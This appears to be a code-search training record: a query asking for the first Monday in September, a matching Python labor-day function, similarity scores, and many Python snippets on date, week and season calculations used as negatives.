seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def get_prev_year_end(x: Optional[Date] = None, years: PositiveInteger = _POS_INT_1) -> Date:\n return Date((x or get_today()).year - years, 12, 31)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def num_of_day(month, year):\n if month in _31_DAYS_MONTHS:\n return 31\n elif month in _30_DAYS_MONTHS:\n return 30\n elif month == 2:\n return 29 if year % 400 == 0 or (((year % 4) == 0) and ((year % 100) != 0)) else 28", "def get_player_season(self, season_id):\n return self._pubg.player_season(self.player_id, season_id, self.shard)", "def equinox(year, season):\r\n estimate = estimateEquinox(year, season) # Initial estimate of date of event\r\n t = (estimate - 2451545.0) / 36525\r\n w = 35999.373 * t - 2.47\r\n dL = 1 + 0.0334 * cosFromDeg(w) + 0.0007 * cosFromDeg(2 * w)\r\n s = periodic24(t)\r\n julianEmphemerisDays = estimate + ((0.00001 * s) / dL)\r\n tdt = fromJDtoUtc(julianEmphemerisDays)\r\n return fromTdTtoUtc(tdt)", "def DecYear( YR, MO, DY, HR, MN, SC):\r\n nDays = 365.25\r\n return YR + (MO-1)/12 + (DY-1)/nDays + HR/(nDays*24) + MN/(nDays*24*60) + SC/(nDays*24*3600)", "def get_pvp_season_index(self, region, namespace, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/pvp-season/index', region, **filters)", "def last_quarter(today):\n quarter_date = today - relativedelta(months=1)\n while quarter_date.month % 3 != 0:\n quarter_date = quarter_date - relativedelta(months=1)\n return quarter_date.year, int(quarter_date.month / 3)", "def yearfrac(self) -> float:\n return (self.last_idx - self.first_idx).days / 365.25", "def seasonality(df):\n df_datetime = pd.DatetimeIndex(df.date_time)\n df[\"month\"] = df_datetime.month\n df = drop_cols(df, [\"date_time\"])\n\n return df", "def get_seasons_information():\n\n #getting the guidebox_id variable from show_page.html\n guidebox_id = request.args.get(\"guidebox_id\")\n\n #make API to get season information, gets back list of season information\n seasons_results = guidebox_season_info(guidebox_id)\n\n for season in seasons_results:\n date = season[\"first_airdate\"]\n year = str(date)[0:4]\n season[\"first_airdate\"] = year\n\n return jsonify(seasons_results)", "def closeyear(year):\n\n # Return the specific year\n return int(year % 4)", "def to_fixed(self):\n begin = ifloor((self.year + self.SOLAR_ERA + ((self.month - 1)/12)) * self.SIDEREAL_YEAR + OldHindu.EPOCH)\n return self.day - 1 + next_int(begin - 3, lambda d: self.zodiac(self.sunrise(d + 1)) == self.month)" ]
[ "0.81641465", "0.7565352", "0.74286443", "0.6773904", "0.66487664", "0.6576127", "0.65571433", "0.6517643", "0.6495419", "0.64488924", "0.64429444", "0.64425147", "0.64404756", "0.6364527", "0.62375706", "0.61532784", "0.61332804", "0.6104992", "0.5971628", "0.5910558", "0.5863225", "0.582131", "0.57585377", "0.57450205", "0.5730995", "0.5719832", "0.5665247", "0.56471336", "0.5624144", "0.56237185", "0.5604175", "0.55866754", "0.55809045", "0.5570084", "0.55387765", "0.55318046", "0.5506367", "0.5503711", "0.54854596", "0.5478793", "0.54778475", "0.5464001", "0.54059213", "0.54020613", "0.53774446", "0.537477", "0.53747654", "0.5362659", "0.5354819", "0.5348997", "0.5324601", "0.5316898", "0.53057176", "0.5287074", "0.52844775", "0.52724516", "0.52705586", "0.52619153", "0.5248508", "0.5246867", "0.52272725", "0.5222711", "0.52172285", "0.5206942", "0.52030253", "0.5201963", "0.52009916", "0.51864576", "0.51531255", "0.5134457", "0.5127182", "0.5111676", "0.51053804", "0.5104991", "0.50999856", "0.509652", "0.5087805", "0.5084714", "0.5075693", "0.50750256", "0.5070052", "0.5062363", "0.50472283", "0.5045036", "0.50350493", "0.5032463", "0.50218695", "0.5017402", "0.50136375", "0.50116795", "0.50086594", "0.499824", "0.49960035", "0.49765474", "0.49737987", "0.49736923", "0.49676958", "0.49659175", "0.4960364", "0.49533868" ]
0.8059089
1
Returns first Monday in September of given year
def _labor_day(year): day = datetime(year, 9, 1) delta = timedelta(days=1) while day.weekday() != 0: day += delta return day
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum = TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def first_monday_of_week(year, week):\n weekyear = \"{} {} 1\".format(year, week)\n return time.asctime(time.strptime(weekyear, \"%Y %U %w\"))", "def first_day_of_year(year):\n year -= 1\n return (year + (year // 4) - (year // 100) + (year // 400) + 1) % NUM_DAYS_IN_WEEK", "def week_start_on_monday(weekday):\n return (weekday - 1 + 6) % 7 + 1", "def get_mothers_day_date(year):\r\n start_date = parse(f\"Jan {year}\").date()\r\n for date in rrule(YEARLY, dtstart=start_date, bymonth=5, byweekday=SU, bysetpos=2):\r\n if date.year == year:\r\n return date.date()", "def MayDay(year):\n\n day = datetime.date(year, 5, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 1:\n return day\n day += datetime.timedelta(days=1)", "def get_next_monday(date):\n return date + datetime.timedelta(days=-date.weekday(), weeks=1)", "def get_mothers_day_date(year):\n day = date(year=year, month=5, day=1)\n while 1:\n if day.weekday() == 6:\n day += timedelta(days=7)\n break\n day += timedelta(days=1)\n return day", "def DayOfWeek(year, month, day):\n num = year * 365\n num = num + year // 4 + 1\n num = num - (year // 100 + 1)\n num = num + year // 400 + 1\n if month < 3 and LeapYear(year):\n num = num - 1\n return (num + MONTH_OFFSETS[month - 1] + day + 4) % 7 + 1", "def _get_next_monday(self):\n today = datetime.date.today()\n weekday_int = today.weekday()\n if weekday_int == 0:\n return today\n next_mon = today + timedelta(7 - weekday_int)\n return next_mon", "def day_of_week(day, month, year):\n bias = (14 - month) // 12\n m_year = year - bias\n mth = month + 12 * bias - 2\n return (day + m_year + m_year // 4 - m_year // 100 + m_year // 400 + (31 * mth) // 12) % 7", "def GetFirstSundayOfMonth(year, month):\n weeks = calendar.Calendar().monthdays2calendar(year, month)\n # Return the first day in the first week that is a Sunday.\n return [date_day[0] for date_day in weeks[0] if date_day[1] == 6][0]", "def date_week_of_year(date, *, sunday_is_first_day_of_week: bool = False):\n if sunday_is_first_day_of_week:\n return date.strftime(\"%U\")\n else:\n return date.strftime(\"%V\")", "def Day_of_week(day, month, year):\r\n if year % 4 == 0 and (year % 400 == 0 or year % 100 != 0):\r\n doomsday = [11, 29, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n else:\r\n doomsday = [10, 28, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n exact_day = ((day - doomsday[month-1]) + Dooms_day(year)) % 7\r\n character_day = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \r\n \"Friday\", \"Saturday\"]\r\n return character_day[exact_day]", "def get_week(date):\n\n # TODO: the API seems broken. It returns week, year not year, week as documentef\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def first_day_of_month(date):\n return date.replace(day=1)", "def first_day_of_month(date):\n return date.replace(day=1)", "def week_of_month(dt):\n\n first_day = dt.replace(day=1)\n\n dom = dt.day\n adjusted_dom = dom + first_day.weekday()\n\n return int(ceil(adjusted_dom/7.0))", "def first_month_day():\r\n return datetime.now().replace(day=1).strftime('%d-%m-%Y')", "def start_month(d):\n return date(d.year, d.month, 1)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def get_start_date(year, month):\n start_date = date(year, month, 1).strftime(\"%Y-%m-%d\")\n return start_date", "def dayofweek(day, month, year, formatresult=True):\n if formatresult is False:\n return calendar.weekday(year, month, day) + 1\n days = {\n 0: 'Monday',\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\"\n }\n return days[calendar.weekday(year, month, day)]", "def Dooms_day(year):\r\n day = (year % 100 + (year % 100)//4 + Anchor_day(year)) % 7\r\n return day", "def locale_first_weekday():\n\tfirst_weekday = 6 #by default settle on monday\n\n\ttry:\n\t\tprocess = os.popen(\"locale first_weekday week-1stday\")\n\t\tweek_offset, week_start = process.read().split('\\n')[:2]\n\t\tprocess.close()\n\t\tweek_start = datetime.date(*time.strptime(week_start, \"%Y%m%d\")[:3])\n\t\tweek_offset = datetime.timedelta(int(week_offset) - 1)\n\t\tbeginning = week_start + week_offset\n\t\tfirst_weekday = int(beginning.strftime(\"%w\"))\n\texcept:\n\t\tprint \"WARNING - Failed to get first weekday from locale\"\n\n\treturn first_weekday", "def convert_week_number_to_date(week_number, first_monday, weekday=0):\n assert(1 <= week_number <= 52)\n assert(0 <= weekday <= 6)\n first_gehol_year_day = datetime.strptime(first_monday, \"%d/%m/%Y\")\n num_days = (week_number-1) * 7 + weekday\n dt = timedelta(days = num_days)\n return first_gehol_year_day + dt", "def date_to_day_of_week(year, month, day):\n # Calculate the day offset from Jan, 1 in the specified year.\n day_num = date_to_day_of_year(year, month, day)\n\n is_pre_2k = year < 2000\n if is_pre_2k:\n # Calculate the number of days from the end of the year.\n num_days = days_in_year(year) - day_num + 1\n start, step = 1999, -1\n else:\n # Calculate the number of days from the beginning of the year.\n num_days = day_num - 1\n start, step = 2000, 1\n\n for _year in range(start, year, step):\n num_days += days_in_year(_year)\n\n # Add the number of days to the day number for Jan 1, 2000 modulus 7\n # to get the current day number.\n if is_pre_2k:\n num_days = -num_days\n\n return (JAN_1_2000_DAY_NUM + num_days) % 7", "def find_date(startdate, weekday, weeknumber):\n import datetime\n # The +1 makes this match up with linux times (day 1 = Monday)\n daysahead = weekday - (startdate.weekday() + 1)\n if daysahead < 0:\n # Target day already happened this week\n daysahead += 7\n # Add 7 days for each Week Of Month we want - but 'This' week is week 1\n daysahead += 7 * (weeknumber - 1)\n return startdate + datetime.timedelta(daysahead)", "def first_day_of_month():\n first_object = datetime.utcnow()\n first_string = first_object.strftime('%m/01/%Y')\n return first_string", "def get_year_half_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof.replace(month=((asof.month - 1) // 6) * 6 + 1, day=1)", "def week_of_month(dt):\n try:\n first_day = dt.replace(day=1)\n dom = dt.day\n if first_day.weekday() == 6:\n adjusted_dom = dom + day_of_week(dt) - 1\n else:\n adjusted_dom = dom + day_of_week(dt)\n return int(ceil(adjusted_dom/7.0))\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700; FUNCTION ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def calculate_date(month, year):\n start_index = day_of_week(1, month, year)\n end_index = num_of_day(month, year)\n padding_day = [0 for i in range(0, start_index)]\n days = [i for i in range(1, end_index + 1)]\n return padding_day + days", "def meetup_day(year, month, dow, wom):\n first_dow = monthrange(year, month)[0]\n days_in_month = monthrange(year, month)[1]\n possible_dates = []\n print str(year) + str(month) + dow + wom\n\n \"\"\"Build dictionary of possible dates based on dow\"\"\"\n for day in range(1, days_in_month+1):\n if datetime.date(year, month, day).strftime(\"%A\") == dow:\n print day\n possible_dates.extend([day])\n\n \"\"\"Perform logic on wom constraint\"\"\"\n if wom == \"teenth\":\n for day in possible_dates:\n if day > 12 and day < 20:\n return datetime.date(year, month, day)\n elif wom == \"last\":\n return datetime.date(year, month, possible_dates[-1])\n else:\n return datetime.date(year, month, possible_dates[ int(wom[:1]) - 1 ])", "def Anchor_day(year):\r\n day = (5 * ((year // 100) % 4) + 2) % 7\r\n return day", "def get_year_start(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(month=1, day=1)", "def _calculate_date(day_of_year):\n date = datetime.datetime.strptime(str(day_of_year), '%j')\n return date.strftime('%d-%b')", "def minyear():\n\n return datetime.MINYEAR", "def distributeWeekday(self, jan1):\n self.firstday = jan1\n for day in self.daylist:\n if jan1%7 == 6 or jan1%7 == 0:\n day.weekday = 'weekend'\n jan1 = jan1 + 1", "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def get_next_hockey_year(year=None):\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_current_year() + get_next_year()\n\n else: # if month >= 9 (Sept)\n next_year = get_next_year()\n return next_year + get_next_year(year=next_year)", "def yearMonthDay() :\n timeDateValue = time.asctime(time.gmtime()).lower().split()\n if int(timeDateValue[2]) < 10 : timeDateValue[2] = str('0'+str(timeDateValue[2]))\n return '%s%s%s' % (timeDateValue[4],timeDateValue[1],timeDateValue[2])", "def print_month(first_day, month, year):\n print_month_header(month)\n days = days_in_month(month, year)\n\n # Print leading space before the first day in this month\n for i in range(first_day):\n print(\" \", end=\"\") # four spaces per day\n\n # Print numbers for all the days in the month\n for i in range(0, days):\n print(format_number(i + 1), end=\"\")\n # Add a new line at end of the week\n if ((first_day + i) % NUM_DAYS_IN_WEEK) == (NUM_DAYS_IN_WEEK - 1):\n print(\"\")\n # Add a new line at the end of the month\n print(\"\")\n\n # Return day of week for first day for the month after this one\n return (first_day + days) % NUM_DAYS_IN_WEEK", "def test_monday(self):\n date = datetime.date(1981, 5, 4)\n self.assertEqual(date.isoweekday(), 1)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def meetup_day(year, month, day_of_week, day_occurrence):\n \n cal = calendar.monthcalendar(year, month)\n day_of_week_index = days_of_week[day_of_week]\n \n not_teenth = day_occurrence != 'teenth'\n day_is_in_first_week = cal[0][day_of_week_index] != 0\n \n if not_teenth and day_is_in_first_week:\n week_index = week_indices[day_occurrence]\n \n elif not_teenth and not day_is_in_first_week:\n week_index = week_indices[day_occurrence] + 1\n \n else:\n for i in range(len(cal)):\n if cal[i][day_of_week_index] >= 10:\n week_index = i\n break\n\n date = cal[week_index][day_of_week_index]\n return datetime.date(year, month, date)", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def MLK(year):\n\n day = datetime.date(year, 1, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 3:\n return day\n day += datetime.timedelta(days=1)", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def day_of_year(date=datetime.datetime.now()):\n return date.strftime(\"Its the %j day of %Y'th year.\")", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def get_first_date(in_month=1):\n\n from_date = (today-relativedelta(months=in_month)).replace(day=1)\n \n return from_date", "def thanksgiving(year, country='usa'):\n if country == 'usa':\n if year in [1940, 1941]:\n return nth_day_of_month(3, THU, NOV, year)\n elif year == 1939:\n return nth_day_of_month(4, THU, NOV, year)\n\n return nth_day_of_month(0, THU, NOV, year)\n\n if country == 'canada':\n return nth_day_of_month(2, MON, OCT, year)\n\n raise NotImplementedError('Unsupported argument for country')", "def get_month_start(x: Optional[Date] = None) -> Date:\n return (x or get_today()).replace(day=1)", "def start(year, month, day):\n output=datetime.datetime(year, month, day)\n return output", "def ceil_start_month(date):\n if date.month == 12:\n date = datetime(date.year + 1, 1, 1)\n else:\n date = datetime(date.year, date.month + 1, 1)\n return date", "def doomsday(y):", "def day_of_the_week(arg):", "def next_week_start(iso_date: Optional[str] = None) -> date:\n if iso_date:\n current_date = date.fromisoformat(iso_date)\n else:\n current_date = date.today()\n\n days_until_monday = 7 - current_date.weekday()\n\n candidate_start = current_date + timedelta(days=days_until_monday)\n while candidate_start in holidays.US():\n candidate_start += timedelta(days=1)\n\n return candidate_start", "def get_week_of_year(date, padded_or_unpadded, start_Sunday_or_Monday):\n if start_Sunday_or_Monday == constants.str_Sunday:\n week_of_year = date.strftime('%U')\n elif start_Sunday_or_Monday == constants.str_Monday:\n week_of_year = date.strftime('%W')\n else:\n err_msg = str_possible_values('start_Sunday_or_Monday', [\n constants.str_Sunday, constants.str_Monday])\n raise ValueError(err_msg)\n\n if padded_or_unpadded == constants.str_padded:\n return week_of_year\n elif padded_or_unpadded == constants.str_unpadded:\n return str(int(week_of_year))\n else:\n err_msg = str_possible_values('padded_or_unpadded', [\n constants.str_padded, constants.str_unpadded])\n raise ValueError(err_msg)", "def date_to_day_of_year(year, month, day):\n # If month is January, just return the day.\n if month == 1:\n return day\n # Accumulate days from all months prior to the specified month.\n num_days = 0\n for i in range(1, month):\n num_days += ABBREV_MONTH_NUM_DAYS_PAIRS[i - 1][1]\n # Maybe add a leap day.\n if month > 2 and is_leap_year(year):\n num_days += 1\n # Return the sum of day and prior months' days.\n return num_days + day", "def yearlysection(month=1, day=1, hour=0, minute=0, second=0):\n return datetime.datetime(datetime.MINYEAR,\n month=month, day=day,\n hour=hour, minute=minute, second=second)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def date_to_dow(y, m, d):\r\n # Python uses Monday week start, so wrap around\r\n w = calendar.weekday(y, m, d) + 1\r\n if w == 7:\r\n w = 0\r\n return w", "def convert_date(year: str, week: str):\n date = datetime.fromisocalendar(int(year), int(week), 1)\n return date.strftime(\"%m/%d/%YZ\")", "def get_week_from_date(date) -> int:\n month, year = date.month, date.year\n if month < 4:\n year -= 1\n ld = _labor_day(year)\n wk1_wed = ld + timedelta(days=2)\n days_since = (date - wk1_wed).days\n weeks_since = days_since / 7.\n week = math.floor(weeks_since) + 1\n return int(week)", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def next_month(year, month):\n if month < 12:\n month += 1\n else:\n month = 1\n year += 1\n return year, month", "def weekday(day):\n return (day % 7) - 1", "def get_current_hockey_year_start():\n\n today = date.today()\n\n # if we are in the end of a hockey year (anytime from jan 1 until next season \"sept\")\n if today.month <= 8:\n return get_last_year()\n\n else: # if month >= 9 (Sept)\n return get_current_year()", "def day_of_year(self):\n return int(self.date.strftime('%j'))", "def current_season() -> int:\n now = datetime.now()\n month, year = now.month, now.year\n if month < 4:\n year -= 1\n return year", "def getWaterYear(date):\n\n year = date.year\n yearstring = \"{}/{}\"\n if date.month >= 10:\n return yearstring.format(year, year + 1)\n else:\n return yearstring.format(year - 1, year)", "def weeks_per_year(year):\n return week_from_date(date(year, 12, 31))", "def day_of_year(month, day):\n try:\n # 2003 is an arbitrary non-leap year.\n return date(2003, month, day).timetuple().tm_yday\n except ValueError:\n if month == 2 and day == 29:\n return 60\n else:\n raise", "def day_07_b() -> int:\n return 0", "def indigenous_peoples_day(year, country='usa'):\n if country == 'usa':\n return nth_day_of_month(2, MON, OCT, year)\n\n return (year, OCT, 12)", "def nextDay(year, month, day):\n if day < 30:\n day += 1\n else:\n if month < 12:\n month += 1\n day = 1\n else:\n year += 1\n month = 1\n day = 1\n \n return(year, month, day)", "def get_weekday():\n result = datetime.today().weekday() + 1\n return result", "def find_day_of_week(year, month, day_of_week, offset=0, use_datetime=False):\n iter = Calendar().itermonthdates(year, month)\n n = 0\n\n for value in iter:\n if month != value.month:\n continue\n\n if day_of_week == weekday(value.year, value.month, value.day):\n if n == offset:\n return convert_date_to_datetime(value) if use_datetime else value\n else:\n n += 1\n\n return None", "def day_of_the_programmer(year):\n leap, total = 0, 256\n\n #Determine Leap Years\n if year <= 1917 and year >= 1700: # Julian calendar\n if year % 4 == 0:\n leap = 1\n elif year == 1918:\n leap = -13\n elif year >= 1919 and year <= 2700: # Gregorian Calendar\n if year % 400 == 0 or (year % 4 == 0 and year % 100 != 0):\n leap = 1\n\n days_in_month = [31, 28 + leap, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n # Determine month and day\n for i in xrange(len(days_in_month)):\n total -= days_in_month[i]\n if total < 1:\n month = i + 1\n day = total + days_in_month[i]\n break\n\n # format output into 'dd.mm.yyyy'\n day = '{:02d}'.format(day)\n month = '{:02d}'.format(month)\n yyyy = '{:04d}'.format(year)\n return day + '.' + month + '.' + yyyy", "def weekly():", "def date_to_week(y, m, d):\r\n return datetime.datetime(y, m, d).strftime(r'%YW%W')", "def get_day_of_week(year: int, dow: int) -> List[date]:\n new_year = date(year, 1, 1)\n start_date = new_year + timedelta(days=dow - new_year.weekday())\n start_date = start_date + timedelta(days=7) if start_date < new_year else start_date\n\n dates = []\n while start_date.year == year:\n dates.append(start_date)\n start_date += timedelta(days=7)\n return dates", "def getPinnedDayOfNextMonth(year, month, day):\n\tyear = year + (month / 12) # purposeful integer division\n\tmonth = (month % 12) + 1\n\tday = pinDayToMonth(year, month, day)\n\treturn datetime.date(year, month, day)", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def nth_dow_to_day(tupel, y):\r\n m = tupel[0]\r\n dow = tupel[1]\r\n n = tupel[2]\r\n\r\n if dow == 7:\r\n dow = 0\r\n\r\n first_dow = date_to_dow(y, m, 1) # the dow of the first of the month\r\n shift = dow - first_dow\r\n if shift < 0:\r\n shift += 7\r\n\r\n return shift + (7 * n) - 6", "def adjust_year(date_obj):\n today = date.today()\n if today.month == 12:\n if date_obj.month == 1:\n return date_obj.replace(year=today.year + 1)\n return date_obj.replace(year=today.year)", "def increment_year_month(year, month):\n month += 1\n if month == 13:\n year += 1\n month = 1\n return year, month", "def pick_month():\n today = date.today()\n month = date(today.year, today.month, 1)\n if today.day < 14:\n # Use last month\n month -= timedelta(days=27)\n while month.day != 1:\n month -= timedelta(days=1)\n return month", "def twenty_seventeen():\n return 2017", "def get_weekday_number(date):\n return date.strftime('%w')", "def get_business_day_of_month_before(year, month, day):\n try:\n adate = datetime.datetime(year, month, day)\n except ValueError:\n try:\n adate = datetime.datetime(year, month, 30)\n except ValueError:\n try:\n adate = datetime.datetime(year, month, 29)\n except ValueError:\n adate = datetime.datetime(year, month, 28)\n r = rrule.rrule(\n rrule.MONTHLY, byweekday=(rrule.MO, rrule.TU, rrule.WE, rrule.TH, rrule.FR),\n dtstart=datetime.datetime(year, month, 1))\n res = r.before(adate, inc=True)\n if (res is None or res.month != month or res.year != year):\n raise ValueError(\"No dates found in range. is there a flaw in your logic?\")\n return res.date()", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def nextDay(year, month, day):\n if day < daysInMonth(year,month):\n return year, month, day + 1\n else:\n if month == 12:\n return year + 1, 1, 1\n else:\n return year, month + 1, 1", "def dia_revolucion(year):\n return nth_day_of_month(3, MON, NOV, year)", "def DATE(year, month, day):\n if year < 1900:\n year += 1900\n norm_month = (month - 1) % 12 + 1\n norm_year = year + (month - 1) // 12\n return datetime.date(norm_year, norm_month, 1) + datetime.timedelta(days=day - 1)", "def day_of_month():\n return datetime.date.today().day", "def find_day_of_year(year, month, day):\n\n leap_flag = year % 4 == 0\n feb_days = np.where(leap_flag, 29, 28)\n days_per_month = np.array([31, feb_days, 31, 30, 31, 30, 31, 31,\n 30, 31, 30, 31])\n return np.sum(days_per_month[0:month-1]) + day - 1", "def countSundaysFirstOfMonth(startYear, endYear):\n\tdayOfWeek = 1\n\tnumSundays = 0\n\tfor year in xrange(1900, endYear + 1):\n\t\tfor month in xrange(1, 13):\n\t\t\tif year >= startYear and dayOfWeek == 0:\n\t\t\t\tnumSundays += 1\n\t\t\tdayOfWeek += numDays(month, year)\n\t\t\tdayOfWeek %= 7\n\treturn numSundays", "def date_day_of_month(date):\n return date.day", "def next_day_of_week(current, day_of_week):\n\n while current.weekday() != day_of_week:\n current += timedelta(1)\n return current" ]
[ "0.74452096", "0.7358948", "0.71944577", "0.6750746", "0.66948074", "0.6441872", "0.63434887", "0.6304483", "0.6295698", "0.6277809", "0.62662905", "0.62631595", "0.6171451", "0.6164381", "0.6106714", "0.60991955", "0.60991955", "0.6070933", "0.60079587", "0.59685105", "0.59345454", "0.59336", "0.5899373", "0.5886059", "0.58811253", "0.58055943", "0.5798165", "0.5751986", "0.57394296", "0.5728061", "0.57145005", "0.57094467", "0.5706808", "0.568835", "0.56848973", "0.5681779", "0.5677155", "0.5662916", "0.56410563", "0.5620512", "0.5596713", "0.5596077", "0.55912936", "0.5587555", "0.557419", "0.5571951", "0.5553572", "0.5551966", "0.5536897", "0.5524497", "0.55193126", "0.54795945", "0.54538137", "0.54520446", "0.54338026", "0.54267585", "0.54226166", "0.5398363", "0.5388697", "0.53845835", "0.5383154", "0.5381845", "0.5358328", "0.535351", "0.5342051", "0.53308904", "0.5321841", "0.5310505", "0.53057534", "0.52951133", "0.52901024", "0.52876866", "0.5287507", "0.5286121", "0.52764684", "0.5256523", "0.5236005", "0.5232269", "0.52169436", "0.52164644", "0.5214625", "0.5212777", "0.52108985", "0.519237", "0.5176465", "0.51733977", "0.51637477", "0.5158382", "0.5151391", "0.51505935", "0.5127659", "0.51266754", "0.5111498", "0.5088184", "0.50872296", "0.50863886", "0.5085841", "0.5078016", "0.50613874", "0.50456303" ]
0.64837617
5
Get NFL week (ESPN scoring period) from date The year of the given date determines the relevant NFL season. Assumes week 1 begins the week of Labor Day and ends the following Wednesday. Does not cap value, so may be below 1 or above 17.
def get_week_from_date(date) -> int: month, year = date.month, date.year if month < 4: year -= 1 ld = _labor_day(year) wk1_wed = ld + timedelta(days=2) days_since = (date - wk1_wed).days weeks_since = days_since / 7. week = math.floor(weeks_since) + 1 return int(week)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_week(date):\n\n # TODO: the API seems broken. It returns week, year not year, week as documentef\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def ISOWEEKNUM(date):\n return _make_datetime(date).isocalendar()[1]", "def GetWeekNum(self, date):\n (y, m, d) = date.split('-')\n return (dt.date(int(y), int(m), int(d)) - self.START_DATE).days / 7", "def weeks_per_year(year):\n return week_from_date(date(year, 12, 31))", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def ISOWEEKNUM(\n date: func_xltypes.XlDateTime\n) -> func_xltypes.XlNumber:\n\n datetime_date = utils.number_to_datetime(int(date))\n isoweeknum = datetime_date.isocalendar()[1]\n return isoweeknum", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def date_week_of_year(date, *, sunday_is_first_day_of_week: bool = False):\n if sunday_is_first_day_of_week:\n return date.strftime(\"%U\")\n else:\n return date.strftime(\"%V\")", "def get_week_from_datestr(datestr: str) -> int:\n return date.fromisoformat(datestr).isocalendar()[1]", "def get_week_of_year(date, padded_or_unpadded, start_Sunday_or_Monday):\n if start_Sunday_or_Monday == constants.str_Sunday:\n week_of_year = date.strftime('%U')\n elif start_Sunday_or_Monday == constants.str_Monday:\n week_of_year = date.strftime('%W')\n else:\n err_msg = str_possible_values('start_Sunday_or_Monday', [\n constants.str_Sunday, constants.str_Monday])\n raise ValueError(err_msg)\n\n if padded_or_unpadded == constants.str_padded:\n return week_of_year\n elif padded_or_unpadded == constants.str_unpadded:\n return str(int(week_of_year))\n else:\n err_msg = str_possible_values('padded_or_unpadded', [\n constants.str_padded, constants.str_unpadded])\n raise ValueError(err_msg)", "def WEEKNUM(date, return_type=1):\n if return_type == 21:\n return ISOWEEKNUM(date)\n if return_type not in _weekday_type_map:\n raise ValueError(\"Invalid return type %s\" % (return_type,))\n (first, index) = _weekday_type_map[return_type]\n date = _make_datetime(date)\n jan1 = datetime.datetime(date.year, 1, 1)\n week1_start = jan1 - datetime.timedelta(days=(jan1.weekday() - first) % 7)\n return (date - 